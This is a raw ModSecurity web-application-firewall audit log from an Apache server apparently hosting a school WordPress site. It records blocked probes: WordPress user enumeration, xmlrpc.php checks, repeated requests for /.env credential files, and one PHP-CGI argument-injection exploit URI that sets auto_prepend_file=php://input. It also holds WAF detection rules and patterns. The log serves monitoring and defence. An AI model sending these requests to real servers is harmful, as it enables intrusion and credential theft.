ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746091076416492 6620 (- - -) Stopwatch2: 1746091076416492 6620; combined=4921, p1=617, p2=4009, p3=39, p4=44, p5=121, sr=75, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0efce74-Z-- --749b9b1f-A-- [01/May/2025:16:24:43 +0700] aBM92-VeTgVPHjrSAYCUYQAAAAk 103.236.140.4 41418 103.236.140.4 8181 --749b9b1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --749b9b1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --749b9b1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746091483121513 3519 (- - -) Stopwatch2: 1746091483121513 3519; combined=1519, p1=542, p2=945, p3=0, p4=0, p5=31, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --749b9b1f-Z-- --df31831d-A-- [01/May/2025:16:24:46 +0700] aBM93igtr0Qsi1mFAsN4AwAAAIo 103.236.140.4 41430 103.236.140.4 8181 --df31831d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.61 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --df31831d-C-- demo.sayHello --df31831d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --df31831d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746091486001923 6161 (- - -) Stopwatch2: 1746091486001923 6161; combined=4506, p1=598, p2=3676, p3=32, p4=34, p5=97, sr=129, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df31831d-Z-- --da0e2940-A-- [01/May/2025:16:24:47 +0700] aBM934144kZ4LAGlEgxvfQAAANA 103.236.140.4 41440 103.236.140.4 8181 --da0e2940-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.39.9 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.39.9 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --da0e2940-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da0e2940-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746091487490999 790 (- - -) Stopwatch2: 1746091487490999 790; combined=367, p1=322, p2=0, p3=0, p4=0, p5=44, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da0e2940-Z-- --809d5500-A-- [01/May/2025:18:14:39 +0700] aBNXn-VeTgVPHjrSAYCdLQAAABg 103.236.140.4 39238 103.236.140.4 8181 --809d5500-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --809d5500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --809d5500-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746098079777287 3060 (- - -) Stopwatch2: 1746098079777287 3060; combined=1299, p1=419, p2=847, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --809d5500-Z-- --04f6e655-A-- [01/May/2025:18:14:42 +0700] aBNXouVeTgVPHjrSAYCdLwAAAA4 103.236.140.4 39254 103.236.140.4 8181 --04f6e655-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.55 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --04f6e655-C-- demo.sayHello --04f6e655-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f6e655-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746098082691359 5174 (- - -) Stopwatch2: 1746098082691359 5174; combined=3600, p1=466, p2=2945, p3=27, p4=30, p5=77, sr=59, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f6e655-Z-- --388a9e12-A-- [01/May/2025:18:14:46 +0700] aBNXpuVeTgVPHjrSAYCdMgAAAAQ 103.236.140.4 39270 103.236.140.4 8181 --388a9e12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --388a9e12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --388a9e12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746098086646241 2990 (- - -) Stopwatch2: 1746098086646241 2990; combined=1289, p1=419, p2=840, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388a9e12-Z-- --19ea9539-A-- [01/May/2025:18:14:48 +0700] aBNXqMVMAgMJpNzaVtIndgAAAFM 103.236.140.4 39282 103.236.140.4 8181 --19ea9539-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.194 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --19ea9539-C-- demo.sayHello --19ea9539-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --19ea9539-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746098088833390 5807 (- - -) Stopwatch2: 1746098088833390 5807; combined=4301, p1=534, p2=3539, p3=29, p4=31, p5=100, sr=71, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19ea9539-Z-- --8ac1c303-A-- [01/May/2025:18:18:47 +0700] aBNYl4144kZ4LAGlEgx24QAAAMg 103.236.140.4 40334 103.236.140.4 8181 --8ac1c303-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8ac1c303-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ac1c303-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746098327854806 2851 (- - -) Stopwatch2: 1746098327854806 2851; combined=1251, p1=433, p2=783, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ac1c303-Z-- --476c612b-A-- [01/May/2025:18:18:50 +0700] aBNYmsVMAgMJpNzaVtInvwAAAEc 103.236.140.4 40350 103.236.140.4 8181 --476c612b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.150 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --476c612b-C-- demo.sayHello --476c612b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --476c612b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746098330617735 5826 (- - -) Stopwatch2: 1746098330617735 5826; combined=4729, p1=596, p2=3892, p3=39, p4=44, p5=94, sr=76, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --476c612b-Z-- --0749fe59-A-- [01/May/2025:18:23:00 +0700] aBNZlOVeTgVPHjrSAYCd-wAAAAg 103.236.140.4 41294 103.236.140.4 8181 --0749fe59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0749fe59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0749fe59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746098580673482 2701 (- - -) Stopwatch2: 1746098580673482 2701; combined=1400, p1=457, p2=912, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0749fe59-Z-- --08ef4144-A-- [01/May/2025:18:23:05 +0700] aBNZmY144kZ4LAGlEgx3GgAAAM8 103.236.140.4 41318 103.236.140.4 8181 --08ef4144-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --08ef4144-C-- demo.sayHello --08ef4144-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --08ef4144-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746098585670234 4990 (- - -) Stopwatch2: 1746098585670234 4990; combined=3886, p1=444, p2=3229, p3=29, p4=25, p5=92, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08ef4144-Z-- --fcb0ed0e-A-- [01/May/2025:19:46:06 +0700] aBNtDuVeTgVPHjrSAYCjSwAAABA 103.236.140.4 60420 103.236.140.4 8181 --fcb0ed0e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.234 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Charset: utf-8 --fcb0ed0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcb0ed0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746103566929468 763 (- - -) Stopwatch2: 1746103566929468 763; combined=365, p1=331, p2=0, p3=0, p4=0, p5=34, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcb0ed0e-Z-- --bfe4492f-A-- [01/May/2025:21:13:50 +0700] aBOBnuVeTgVPHjrSAYCw-AAAABM 103.236.140.4 43712 103.236.140.4 8181 --bfe4492f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.163.159.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --bfe4492f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfe4492f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746108830126021 824 (- - -) Stopwatch2: 1746108830126021 824; combined=389, p1=349, p2=0, p3=0, p4=0, p5=40, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfe4492f-Z-- --5c345e33-A-- [01/May/2025:21:14:23 +0700] aBOBv-VeTgVPHjrSAYCxLAAAAAg 103.236.140.4 44230 103.236.140.4 8181 --5c345e33-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.163.159.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65 Accept-Charset: utf-8 --5c345e33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c345e33-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746108863429740 536 (- - -) Stopwatch2: 1746108863429740 536; combined=207, p1=177, p2=0, p3=0, p4=0, p5=30, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c345e33-Z-- --a31a0910-A-- [01/May/2025:21:32:25 +0700] aBOF-eVeTgVPHjrSAYC3fQAAAAI 103.236.140.4 60664 103.236.140.4 8181 --a31a0910-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.39.9 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.39.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a31a0910-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a31a0910-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746109945701200 766 (- - -) Stopwatch2: 1746109945701200 766; combined=359, p1=322, p2=0, p3=0, p4=0, p5=36, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a31a0910-Z-- --7ec5ae44-A-- [02/May/2025:02:19:21 +0700] aBPJOSgtr0Qsi1mFAsOmSQAAAIw 103.236.140.4 50282 103.236.140.4 8181 --7ec5ae44-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Charset: utf-8 --7ec5ae44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ec5ae44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746127161632509 673 (- - -) Stopwatch2: 1746127161632509 673; combined=296, p1=254, p2=0, p3=0, p4=0, p5=42, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ec5ae44-Z-- --7da6f626-A-- [02/May/2025:02:56:57 +0700] aBPSCcVMAgMJpNzaVtJYxgAAAEA 103.236.140.4 58934 103.236.140.4 8181 --7da6f626-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --7da6f626-C-- --7da6f626-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7da6f626-E-- --7da6f626-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746129417255316 3753 (- - -) Stopwatch2: 1746129417255316 3753; combined=2578, p1=472, p2=2070, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7da6f626-Z-- --93fab063-A-- [02/May/2025:03:24:23 +0700] aBPYd_NNWdC6CAybkqPzEAAAANM 103.236.140.4 43222 103.236.140.4 8181 --93fab063-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 